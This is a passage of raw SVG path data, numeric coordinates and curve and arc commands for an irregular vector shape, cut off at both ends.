3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0